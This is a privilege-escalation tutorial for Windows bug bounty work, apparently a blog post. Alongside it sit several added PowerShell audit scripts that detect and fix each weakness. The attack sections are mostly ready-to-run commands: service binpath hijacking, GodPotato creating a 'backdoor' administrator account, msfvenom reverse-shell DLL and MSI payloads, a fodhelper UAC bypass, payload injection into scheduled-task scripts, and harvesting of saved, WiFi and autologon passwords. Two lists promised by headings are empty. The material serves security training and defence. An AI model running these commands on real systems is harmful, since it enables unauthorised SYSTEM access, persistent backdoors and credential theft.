Why Windows Privilege Escalation Matters for Bug Bounty

If you've landed a shell on a Windows target — through a web app RCE, phishing simulation, or exposed service — you're almost certainly running as a low-privilege user. The real impact comes from escalating to SYSTEM or Administrator, where you can access credentials, pivot laterally, and demonstrate full compromise.

Bug bounty programs that include desktop applications, enterprise environments, VDI infrastructure, or Microsoft products explicitly reward privilege escalation findings. Even web-focused programs care when you can chain a web vulnerability into local access and then escalate — that's the difference between a medium and a critical severity report.

Enumeration: The Foundation of Every Privesc

Before exploiting anything, you need to understand the target system. Enumeration is where 90% of privesc work happens.

Manual Enumeration Commands

Start with these commands from any shell:

# System info and patch level
systeminfo
wmic qfe list brief

# Current user and privileges
whoami /all
whoami /priv

# Local users and groups
net user
net localgroup administrators

# Running services
wmic service list brief
sc query state= all

# Scheduled tasks
schtasks /query /fo LIST /v

# Installed software
wmic product get name,version

# Network connections
netstat -ano

# Environment variables (look for credentials)
set

Automated Enumeration with WinPEAS

WinPEAS is the go-to automated enumeration tool. It checks hundreds of potential privesc vectors and color-codes findings by severity:

# Run WinPEAS with all checks
.\winPEASany.exe quiet

# Focus on specific areas
.\winPEASany.exe quiet servicesinfo
.\winPEASany.exe quiet applicationsinfo

Pay close attention to RED and YELLOW findings — these are the most likely exploitable vectors.

PowerUp for Misconfiguration Checks

# Import and run all checks
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Check specific vectors
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService

Service Misconfigurations

Windows services run with specific privileges — often as SYSTEM. If you can modify how a service runs, you inherit those privileges.

Unquoted Service Paths

When a service binary path contains spaces and isn't quoted, Windows tries multiple path interpretations:

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Example: A service with path
# C:\Program Files\My App\Service\binary.exe
# Windows tries:
# C:\Program.exe
# C:\Program Files\My.exe
# C:\Program Files\My App\Service\binary.exe

If you can write to any of the intermediate directories, drop a malicious executable at the earlier path and restart the service.

Weak Service Permissions

If you can modify a service's configuration, you can change its binary path to point to your payload:

# Check service permissions with accesschk
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

# If you have SERVICE_CHANGE_CONFIG permission:
sc config VulnService binpath= "C:\temp\shell.exe"
sc stop VulnService
sc start VulnService
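As an added defensive counterpart to the accesschk check above (example code, not from the original post): it parses each service's security descriptor from sc.exe sdshow and reports ACEs that grant SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER (or the generic rights that map to them) to broad, low-privileged principals. It assumes Windows PowerShell 5.1 or later in an elevated session; the principal list is a starting point to extend for your environment.

```powershell
# Added audit (not from the original post). Assumes Windows PowerShell 5.1+, run elevated.
# Service access rights from winsvc.h / winnt.h that let a principal repoint or retake a service.
$SERVICE_CHANGE_CONFIG = 0x00002
$WRITE_DAC             = 0x40000
$WRITE_OWNER           = 0x80000
$GENERIC_WRITE         = 0x40000000   # maps to SERVICE_CHANGE_CONFIG on service objects
$GENERIC_ALL           = 0x10000000
$DangerousMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_WRITE -bor $GENERIC_ALL
# Broad principals that should never hold configuration rights on a service.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-ServiceSddl {
    param([string]$Name)
    # sc.exe sdshow prints a blank line followed by the SDDL string.
    $out = & sc.exe sdshow $Name 2>$null | Where-Object { $_ -and $_.Trim() }
    if ($LASTEXITCODE -ne 0 -or -not $out) { return $null }
    return ($out -join '').Trim()
}

function Get-WeakServiceAce {
    param([string]$Name)
    $sddl = Get-ServiceSddl $Name
    if (-not $sddl) { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }
        try   { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $who = $ace.SecurityIdentifier.Value }
        if ($BroadPrincipals -notcontains $who) { continue }
        [pscustomobject]@{
            Service         = $Name
            Principal       = $who
            AccessMask      = ('0x{0:X}' -f $ace.AccessMask)
            ChangeConfig    = [bool]($ace.AccessMask -band ($SERVICE_CHANGE_CONFIG -bor $GENERIC_WRITE -bor $GENERIC_ALL))
            WriteDacOrOwner = [bool]($ace.AccessMask -band ($WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL))
        }
    }
}

# Audit every installed service. Each hit is exactly what the "sc config binpath=" step above
# relies on; remove the grant with sc.exe sdset (or the GPO "System Services" ACL) to close it.
Get-Service | ForEach-Object { Get-WeakServiceAce $_.Name } | Format-Table -AutoSize
```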

Writable Service Binaries

# Check if you can write to the service binary itself
icacls "C:\Program Files\VulnApp\service.exe"

# If writable, replace with your payload
copy /Y C:\temp\shell.exe "C:\Program Files\VulnApp\service.exe"
sc stop VulnService
sc start VulnService

Token Impersonation Attacks

Service accounts often have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. These privileges let you impersonate tokens from other processes — including SYSTEM.

Checking Your Privileges

whoami /priv

# Look for:
# SeImpersonatePrivilege - Enabled
# SeAssignPrimaryTokenPrivilege - Enabled

GodPotato (2026 Recommended)

GodPotato works on Windows Server 2012 through 2025 and Windows 10/11. It's the most reliable potato attack in 2026:

# Execute command as SYSTEM
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c net user backdoor Password123! /add && net localgroup administrators backdoor /add"

PrintSpoofer

Exploits the Print Spooler service for impersonation — works when the spooler is running:

.\PrintSpoofer64.exe -i -c powershell.exe

DLL Hijacking

When an application loads a DLL, Windows searches directories in a specific order. If you can place a malicious DLL earlier in the search path, it gets loaded instead.

# Find DLL hijacking opportunities with Process Monitor
# Filter: Result = NAME NOT FOUND, Path ends with .dll

# Common hijackable locations:
# - Application directory (if writable)
# - Current working directory
# - System PATH directories (if writable)

# Generate a malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll -o hijack.dll

DLL Search Order

  1. Directory from which the application loaded
  2. System directory (C:\Windows\System32)
  3. 16-bit system directory
  4. Windows directory (C:\Windows)
  5. Current directory
  6. Directories in PATH environment variable
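The following audit script is an added example (not from the original post) that serves both the unquoted service path section and the DLL search order above: it computes the decoy paths Windows would try for each unquoted, space-containing service path, flags those whose directory grants standard users CreateFiles, and applies the same writability check to the machine PATH. Assumes Windows PowerShell 5.1+ in an elevated session; the principal list and the fix commands in the trailing comments are suggestions, not part of the original.

```powershell
# Added audit script (not from the original post). Assumes Windows PowerShell 5.1+ and an
# elevated session so every service's ImagePath and directory ACL can be read.
$CreateFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles   # bit needed to drop a file
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Modify and FullControl include CreateFiles; generic-rights ACEs (negative ints) are not expanded.
        if (([int]$ace.FileSystemRights -band $CreateFiles) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    # Reproduces the lookup described above: for an unquoted C:\Program Files\My App\Service\binary.exe
    # Windows tries C:\Program.exe, then C:\Program Files\My.exe, before the real binary.
    param([string]$ImagePath)
    $exe   = ($ImagePath -split '\.exe', 2)[0]   # drop any arguments after the executable
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

# 1) Services with unquoted, space-containing paths whose decoy locations are writable.
$hits = @(foreach ($svc in Get-CimInstance Win32_Service) {
    $p = $svc.PathName
    if (-not $p -or $p.StartsWith('"') -or $p -notmatch ' ') { continue }
    foreach ($candidate in Get-UnquotedPathCandidates $p) {
        $dir = Split-Path -Parent $candidate
        if (Test-LowPrivWritable $dir) {
            [pscustomobject]@{ Source = "service:$($svc.Name)"; StartMode = $svc.StartMode; Decoy = $candidate; WritableDir = $dir }
        }
    }
})
# 2) System PATH entries a standard user can write to (step 6 of the search order above).
$hits += @(foreach ($dir in ([Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';')) {
    if ($dir -and (Test-LowPrivWritable $dir)) {
        [pscustomobject]@{ Source = 'system PATH'; StartMode = ''; Decoy = "$dir\*.dll"; WritableDir = $dir }
    }
})
$hits | Format-Table -AutoSize
# Fix for service hits: quote the path, e.g.  sc.exe config <svc> binPath= '"C:\Program Files\My App\Service\binary.exe"'
# Fix for directory hits: remove the standard-user write grant, e.g.  icacls <dir> /remove:g Users
```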

Always-Install-Elevated

If both of these registry keys are set to 1, any user can install MSI packages with SYSTEM privileges:

# Check the registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 0x1, generate a malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi

# Install it
msiexec /quiet /qn /i shell.msi
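Added check and remediation for the setting above (example code, not from the original post). It treats the policy as exploitable only when both values are 1 and writes 0 to both when they are; assumes Windows PowerShell 5.1+, and the HKCU read covers only the current user's hive.

```powershell
# Added check and fix (not from the original post). The weakness only exists when BOTH
# policy values are 1; a single value set to 1 is worth noting but is not exploitable.
$Hklm = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
$Hkcu = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'

function Get-AlwaysInstallElevatedValue {
    param([string]$KeyPath)
    # A missing key or value means the policy is not configured, which behaves as 0.
    $item = Get-ItemProperty -Path $KeyPath -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.AlwaysInstallElevated
}

function Get-AlwaysInstallElevatedState {
    $m = Get-AlwaysInstallElevatedValue $Hklm
    $u = Get-AlwaysInstallElevatedValue $Hkcu
    [pscustomobject]@{
        MachinePolicy = $m
        UserPolicy    = $u
        Exploitable   = ($m -eq 1 -and $u -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Writes 0 to both locations. If the value comes from Group Policy it will be reapplied
    # at the next refresh, so also set the GPO itself: Computer/User Configuration >
    # Administrative Templates > Windows Components > Windows Installer >
    # "Always install with elevated privileges" = Disabled.
    foreach ($key in $Hklm, $Hkcu) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

$state = Get-AlwaysInstallElevatedState
$state | Format-List
if ($state.Exploitable) {
    Disable-AlwaysInstallElevated
    Get-AlwaysInstallElevatedState | Format-List   # confirm both values now read 0
}
```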

Scheduled Task Exploitation

Scheduled tasks that run as SYSTEM with writable scripts or binaries are prime targets:

# List scheduled tasks with details
schtasks /query /fo LIST /v | findstr /i /c:"TaskName" /c:"Run As User" /c:"Task To Run"

# Check permissions on the task's binary/script
icacls "C:\Scripts\backup.ps1"

# If writable, inject your payload
echo "cmd /c net user backdoor Password123! /add" >> C:\Scripts\backup.ps1

UAC Bypass Techniques

User Account Control prevents medium-integrity processes from performing admin actions. If your user is in the Administrators group but running at medium integrity, UAC bypass gets you to high integrity without the consent prompt.

Fodhelper Bypass

# Classic fodhelper UAC bypass — works on Windows 10/11
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "cmd.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /f
fodhelper.exe

# Clean up
reg delete "HKCU\Software\Classes\ms-settings" /f
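Added detection helper for the artifact the fodhelper sequence above leaves behind (example code, not from the original post): it searches every loaded user hive for an ms-settings\Shell\Open\command handler, which is not normally present under a user's Classes key, and reports the UAC prompt level that decides whether the bypass runs silently. Assumes Windows PowerShell 5.1+ in an elevated session.

```powershell
# Added detection helper (not from the original post). Assumes Windows PowerShell 5.1+ run
# elevated so every loaded user hive under HKEY_USERS is readable.
$Indicator = 'Software\Classes\ms-settings\Shell\Open\command'

function Find-FodhelperHijack {
    param([switch]$Remove)   # remove the handler key for each finding instead of only reporting it
    if (-not (Test-Path 'HKU:\')) { New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null }
    # Only real user hives (S-1-5-21-...), not the *_Classes hives or built-in service accounts.
    $hives = Get-ChildItem 'HKU:\' | Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notmatch '_Classes$' }
    foreach ($hive in $hives) {
        $key = "HKU:\$($hive.PSChildName)\$Indicator"
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $props = Get-ItemProperty -LiteralPath $key
        try   { $user = (New-Object System.Security.Principal.SecurityIdentifier($hive.PSChildName)).Translate([System.Security.Principal.NTAccount]).Value }
        catch { $user = $hive.PSChildName }
        $finding = [pscustomobject]@{
            User            = $user
            Command         = $props.'(default)'          # "cmd.exe" in the sequence above
            DelegateExecute = ($props.PSObject.Properties.Name -contains 'DelegateExecute')
            Removed         = $false
        }
        if ($Remove) {
            Remove-Item -LiteralPath "HKU:\$($hive.PSChildName)\Software\Classes\ms-settings" -Recurse -Force
            $finding.Removed = $true
        }
        $finding
    }
}

function Get-UacAdminPromptLevel {
    # ConsentPromptBehaviorAdmin 2 ("Always notify") makes auto-elevating binaries such as
    # fodhelper.exe prompt too, so the bypass above no longer completes silently; the default 5
    # skips the prompt for signed Windows binaries, which is what the technique relies on.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                  = $pol.EnableLUA
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin
        AlwaysNotify               = ($pol.ConsentPromptBehaviorAdmin -eq 2)
    }
}

Get-UacAdminPromptLevel | Format-List
Find-FodhelperHijack | Format-Table -AutoSize      # add -Remove to clean up confirmed hits
# Real-time coverage: alert on Sysmon Event ID 13 (registry value set) where TargetObject ends in
# \ms-settings\Shell\Open\command, or on fodhelper.exe spawning cmd.exe / powershell.exe.
```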

UACME

The UACME project catalogs dozens of UAC bypass methods. Many still work in 2026 on unpatched or misconfigured systems:

# UACME with method 23 (sdclt.exe)
.\Akagi64.exe 23 C:\temp\shell.exe

Credential Harvesting for Escalation

Sometimes the fastest path to SYSTEM is finding stored credentials:

# Saved credentials
cmdkey /list

# If credentials exist, use runas
runas /savecred /user:Administrator cmd.exe

# Search for passwords in files
findstr /si "password" *.txt *.ini *.config *.xml
findstr /si "connectionstring" *.config

# WiFi passwords (lateral movement)
netsh wlan show profiles
netsh wlan show profile name="NetworkName" key=clear

# Registry autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Kernel Exploits

When misconfigurations don't exist, kernel exploits are the last resort. Match the target's patch level against known vulnerabilities:

# Get exact build and patch info
systeminfo | findstr /i /c:"OS Version" /c:"Hotfix"

# Use Watson to find missing patches
.\Watson.exe

# Use windows-exploit-suggester
python windows-exploit-suggester.py --database 2026-04-14-mssb.xls --systeminfo sysinfo.txt

Notable kernel exploits still relevant in 2026 for unpatched systems:

Building Escalation Chains for Bug Bounty Reports

The highest-impact bug bounty reports chain multiple findings together. Here's a template for structuring your privesc report:

  1. Initial Access: How you got a shell (web RCE, exposed service, etc.)
  2. Enumeration: What you found during system reconnaissance
  3. Exploitation: The specific privesc technique used, with exact commands
  4. Impact: What SYSTEM access enables — credential dumping, lateral movement, data access
  5. Remediation: Specific fixes for each misconfiguration in the chain

Defensive Checks to Note in Reports

When writing your bug bounty report, include remediation guidance:
